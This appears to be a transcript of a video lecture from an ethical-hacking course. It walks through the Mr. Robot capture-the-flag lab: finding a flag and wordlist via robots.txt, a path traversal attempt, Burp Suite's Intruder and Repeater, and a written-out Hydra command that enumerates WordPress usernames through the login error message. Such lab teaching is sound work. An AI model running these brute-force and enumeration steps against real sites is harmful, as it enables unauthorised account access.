The course is part of this learning path
In this course, we explore brute force attacks, hacking WordPress, changing users, and suid privilege escalation. We'll do this through a CTF (capture the flag) ethical hacking game called Mr. Robot.
Hi, within this lecture, we're going to continue solving our CTF and we're going to consider following our leads over here. So, I'm going to just stop this DirBuster because, again, we have what we need. Like, we know that there is a WordPress over here and we're going to follow that road. And, over here, the Nikto didn't even complete the scan over there. So, we have a lot of things going on over here. So, Nikto can take long, actually. Just be remind that Nikto can take long. So maybe, this can be your first step just run it in the background and just come back and see what happened later. And, as you can see, we started getting some responses over here but it's going to take long. And again, we have an admin folder over there, I believe. So, let me try to go into the admin. So, it actually isn't supposed to be here, right? Because it isn't the regular standard procedure for the WordPress, it's usually wp-admin or wp-login. And again, I believe, it redirects us to index.php. So, I don't know. There is nothing to pursue in didIt/admin folder, I believe. So again, let me try this one. So, as you can see, there is a page parameter over here. Maybe we can change it or maybe we can try something, like directory traversal, like we have found before. So, I'm going to come over here. Not here, but there. And I'm going to just write, '?p=23'. And here you go. So, it just redirects us to index as well. So, nothing happens with page parameter. But maybe, we can just try page one or page zero. Or maybe we can just try directory traversal as I said before. Like this, '../etc/passwd', and see what happens. Nothing is happening. And, in fact, I believe none of this is working because it's all redirecting us to the original index page. So, I believe, it's better to follow the wp-login or WordPress in general, okay? So, over here, we have the short link. We already taken a look at that. So, wp-login, we're definitely going to take a look at this one, okay? And, we have seen that over here as well. And, I believe, we don't have wp-admin this time, we have wp-login. So far, so good. And we can just scan here a little bit and see if we can find anything interesting, much more interesting over here, but I don't think there is, right? So, we're going to have to focus on the wp-login. And, I believe, we haven't checked the robots.txt as well. So, I'm going to take a look at that as well, later on. So, I'm going to come over here, okay? And delete this and come to wp-login. And here you go. This is the login webpage of the WordPress. And I'm going to go for the '10.0.2.15' one more time. This time for wp-admin. They are redirecting us to the same page. As you can see, it's redirecting us to the wp-login. So, this is definitely going to be a wp-login thingy going on over there. So, we have the WordPress Admin login and some other stuff going on over here. But, they are all related with the wp-login, I believe, okay? So, let me see what what this is. We have /license.txt which won't give us anything, I believe. But, it's worth a shot anyway. So, let me see if we have anything else, no. Let me come over here and just search for this one as well. So, '/license.txt'. Let me delete this extra slash and here you go. This is just the license of the WordPress, I believe. So, let me just go back. And better yet, we can just go for the robots.txt, which is the first thing that we should have been looking for, anyway. As you can see, there are a couple of things over here. We have a fsocity.dic and key-1-of-3.txt. So, we have found the first flag, I believe, key-1-of-3.txt. So, I can get that easily from the URL. And we have an fsocity.dic over here. So, this makes me think that this is going to be a brute forcing thing. And also, if you don't know robots.txt, by the way, if you don't know what it is, this is a system in order to say the crawlers of the websites, like Google, just don't look over here, okay? So, don't look over key-1-2-3.txt. And Google doesn't get that and doesn't indexed that with its crawler. But again, as hackers, we should look there first in order to see what's this allowed for the Google. So, I'm going to come over here to my notes.txt and just paste the selection over there. This is our first flag, okay? It was pretty easy to get that. But again, I believe, rather than flag, we should focus on this fsocity.dic over here. So, I'm going to copy this and try to see what's inside of this dictionary and let me just save the file. It says that this is a C source code, but I don't think that's what it is, okay? so I'm just going to save this file and see the content of it. So, if this is a dictionary, as we presume, then I believe, we're going to have to do some kind of brute forcing. So, I'm going to cut this and put this in my CTF folder under MrRobot and paste it over there. And just open it with any text editor like this and here you go. There are a couple of words over here like maybe hundreds or thousands of words, and they should be some kind of password or username or both. We don't know yet, okay? So, you can just take a look at all of those things and try to find some meaningful things. But again, there are a lot over here, so we cannot try them one by one. We have some kind of like generic ones, like file and type. We have some kind of duplications, I believe, and we have a lot over here, right? So, it's going to take some time. And maybe we can just take the unique values, like we have seen in the Bandit, to get rid of the duplicates over here. Like, if you search for URL, we have baseUrl. Let's see if we have another URL over here. Like we have geoUrl, editUrl. we have another URL over here, which is only in uppercase. We have another baseUrl, I believe. So definitely, there are some duplicates. And these are not alphabetically ordered, so it's going to be kind of challenging over here, right? So, I'm going to come over here and clear this up. So, if you run 'ls -la', now we know fsocity is over here and it's seven MB and it's very big. So, we have a lot of things going on over there. So, it's going to take some time. And most probably we're going to have to brute force here, so that we can just log in as a user. And, we don't know if they are here for username or they are here for password. And we don't know if they are here for both. If we are given a dictionary, I believe, most probably they are here for both. So, we can find the username and we can find the password in that dictionary. Otherwise, they wouldn't give us anything and we can just go for the ready-to-use dictionaries like RockYou.txt or Medium DirBuster like we have seen before. But this time, we are given the dictionary. And we are only given one, so I assume there's going to be usernames and passwords in the same dictionary. So, we can use 'wpscan'. I mean, in order to do brute forcing, if you just write, 'wpscan --help', you can see the documentation of the wpscan. And we have a lot of things here like enumeration, brute forcing, link detection, service detection, version detection, plugin detection. So, it's like all in one solution for the WordPress penetration test. And, of course, we're going to use it as well. But first, we're going to have to do it for the username, and I believe, we're going to have to do it for the password after we find the username so that it will make sense because we cannot find the password without any username. So, first of all, I'm just going to search to see if we have any user that is valid inside of that fsocity.dic that we got back from the robots.txt. And if we can find the user, then we're going to find its password as well. So, we can use WordPress WPScan, we can use Hydra, and we can use Burp Suite. So, I'm going to try and show all of those things to you. We're going to have to use a WPScan eventually anyway because it's a WordPress web pentesting, I believe. The CTF is about WordPress pentesting and let me open the 'Burp Suite'. Even though we can use Hydra, we're going to have a need for the Burp Suite anyway because we need to see some responses in order to use Hydra as well. I'm going to show you what I mean, don't worry. Since my proxy is up right now, I'm going to have to turn on my FoxyProxy or just do the proxy settings for the Firefox. If you don't know how to use Burp Suite, please make sure check my web pentesting course or just go for the YouTube for a quick demonstration of Burp Suite or you can just follow along with me. But, I'm going to turn off the FoxyProxy, which will connect to the Burp Suite in order to transfer our requests and responses through the Burp Suite. Burp Suite is a proxy eventually. So here, when we make a request or when we get a response, it will be captured in the Burp Suite first so that we can see them or we can analyze them or even we can change them and send some kind of different responses or requests. So, I'm going to just try with atilatil or atil123546. We don't have that kind of password or username. But, of course, we're going to have to see this. So, I'm just going to 'right-click' over here and send it to 'intruder'. Intruder is the brute forcing module for the Burp Suite. And don't worry, we're not going to use it. I'm just showing it to you that it is possible to do brute forcing with Burp Suite. I'm not going to turn this into a Burp Suite lecture or Burp Suite course. So, I'm going to clear all of these parameters. And if I add some variables over here, like to username and password in the request, I can come over here to 'Payload', or in the Payloads, and I can just choose a list. And, of course, we're going to have to change the attack type from here, like Sniper is only for one parameter. If we come over here to some other attack, we can just choose a different kind of wordlist for different kind of parameters and we can just run it and see what happens. This is cluster bombing and we can do brute forcing directly inside of Burp Suite here as well. But again, we're not going to use this for this purpose. We have Hydra, we have WordPress login. And this is not a web penetration testing course, but rather, we're going to focus on the privilege escalation and gaining access side of things. So, I'm going to send this to 'Repeater'. So, Repeater is important. In the Repeater, make sure you turn the Intercept off by the way, go back to 'Repeater'. Now, you can see this is an "invalid username". The user atil doesn't even exist. So, I'm going to come back to here. In the Repeater, we can just do as many repeats as we want. We can change the request and see what kind of response do we get from the server. That is why we use repeater. We can do tests and see the response of the server at the right-hand side. So, for example, I can just change the login name and password from here and just directly hit 'Send' in order to see what kind of response do we get back from server. It's practical, it's easy to use. So, why do we use this? Because I'm going to show you how to do a brute forcing with Hydra. And for the Hydra, we're going to supply this fsocity.dic as a wordlist. And also, we're going to go for the username first. Then, we can go back and find the password without even using Hydra. We can use some other tools as well so that we can see every one of them. So, first of all, let me just stop blabbering about this and just go for Hydra and supply a username wordlist. For the password, as you can see, if we supply an invalid username, we can get this "invalid username" error message. And this will be different if we can find a valid username. It will say that the password is wrong or something like that. In this case, if we get the error message of "invalid username", we definitely know that this is going to be like not the thing that we are looking for because we want a valid username. So, let's start typing, 'hydra -V', in order to make it verbose, and '-L' in order to supply the list that we are going to work with. And, by the way, list should be in the same folder. When you run 'ls', you can see the fsocity.dic. So, I'm going to say, 'hydra -V -L fsocity.dic'. So, we're going to use this dictionary and we're going to supply a password because we're going to use this dictionary on the username. So, for the password, I'm just going to give, like 'test'. You can give it anything you want because we're not looking for password, we're only looking for not an invalid user. So, over here, we have supplied the password. We have supplied the username. Username list, not the username itself because we don't know the username. And, of course we're going to have to supply the 10.0.2.15, which is our URL over here. And now, this is the reason why we have brought up the Burp Suite in the first place. Anyway, as you can see, we can see the request details over here and we're going to need those things. So, as you can see, we need this thing. We need the log, pwd, wp submitting over here because that's how Hydra will know how to send the request back to the server. And, as you can see, we had that post thing in the Burp Suite. So, I'm going to make sure we write over here, 'http-post-form'. And after that, we're going to have to specify the actual request parameters like pwd and stuff like that. Because it's not common, it's specific to each website. And Hydra will not know where to send the URL request to. So, we're going to just come over here to the Burp Suite itself actually. And get the URL parameters to write it over there. So, it will start with the '/wp.login.php'. And after that, we're going to have a colon over here and just write the parameters like this. So, of course, we don't need redirect to, but we need this one. So, let me copy this and see if we can copy it only and paste it over here. Here you go. So, what will happen over here is that the server understands this parameter. So, it's looking for username as log, it's looking for password as pwd and it's looking for submitting as wp - submit and this is different for every server, different for every backend. So, at the end of it, I'm going to put a colon over here and just write, 'F=Invalid username' and this is the error message that we have. So, what does it mean? It means that if we have this "invalid username", then Hydra will know that this is a failure. And, instead of giving password as 123 and username as atil, we're going to change these two variables that we have supplied over here. So, rather than password, we can actually give anything to password, it won't matter. But you should know how it's done if the case is otherwise. So, just delete the atil and write with this kind of syntax over here, '^USER^'. And for the password, again, just delete it. And as the same way just write, '^PASS^'. So, ^USER^ and ^PASS^. So, user will be replaced by this and password will be replaced by this. So, password will be test in every request so it won't make sense. But, again the reason that we are doing this is because of the need for the username itself. So, we're going to try every possible fsocity.dic alternative over here to find the user that works. So, if we can find the user then we can just brute force the password. And I believe, just hit 'Control + Z' in order to make this stop. I believe we have found it. Here you go. It shows the valid one in blue. So, how does it understand it's valid because we have given the error message to the Burp Suite. Not the Burp Suite, we took it from the URL, but we supplied it in the Hydra. And as you can see, this one didn't get that and it's written in blue. And apparently, the login is Elliot and it shows password as test. But, of course, it's not test. It shows it in green because we have supplied error message as invalid username. And when we give the Elliot as username we should get something else. Let me try this and just write it and here you go. It says that, "The password you entered for the username Elliot is incorrect." So, Hydra did its job. It found one that is working and we have now a username. We don't know if this is a privileged user or just a regular user. Maybe if this doesn't work, we can just go scanning further and we can wait a little bit more in order to see if there is some other users here in this list as well. But, at least for right now, we have one user and we're just going to go for it. So, I'm going to open my notes and just write 'Elliot' over here and in order to take a note. So, let's stop here and continue within the next lecture.
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.